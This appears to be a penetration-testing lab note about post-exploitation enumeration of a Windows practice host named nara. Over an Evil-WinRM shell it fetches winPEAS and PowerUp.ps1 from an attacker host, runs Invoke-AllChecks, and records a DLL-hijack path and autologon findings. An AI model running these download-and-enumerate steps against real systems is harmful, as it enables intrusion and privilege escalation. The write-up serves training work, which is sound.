InfoSec LAB

PEAS

Conducting an automated enumeration after performing a manual enumeration on the nara.nara-security.com(192.168.209.30) host.

*Evil-WinRM* PS C:\tmp> curl http://192.168.45.247/winPEASany.exe -OutFile .\winPEASany.exe

AV is blocking PEAS N/A

PowerUp

*Evil-WinRM* PS C:\tmp> curl http://192.168.45.247/PowerUp.ps1 -OutFile .\PowerUp.ps1

Delivery complete

*Evil-WinRM* PS C:\tmp> . .\PowerUp.ps1
*Evil-WinRM* PS C:\tmp> Invoke-AllChecks
Access denied 
 
ModifiablePath    : C:\Users\tracy.white\AppData\Local\Microsoft\WindowsApps
IdentityReference : NARASEC\Tracy.White
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\tracy.white\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\tracy.white\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\tracy.white\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
 
DefaultDomainName    : NARASEC
DefaultUserName      : tracy.white
DefaultPassword      :
AltDefaultDomainName :
AltDefaultUserName   :
AltDefaultPassword   :
Check                : Registry Autologons

N/A

InfoSec LAB

Explorer

nara_Automated

PEAS

PowerUp

Interactive Graph View

Table of Contents

Backlinks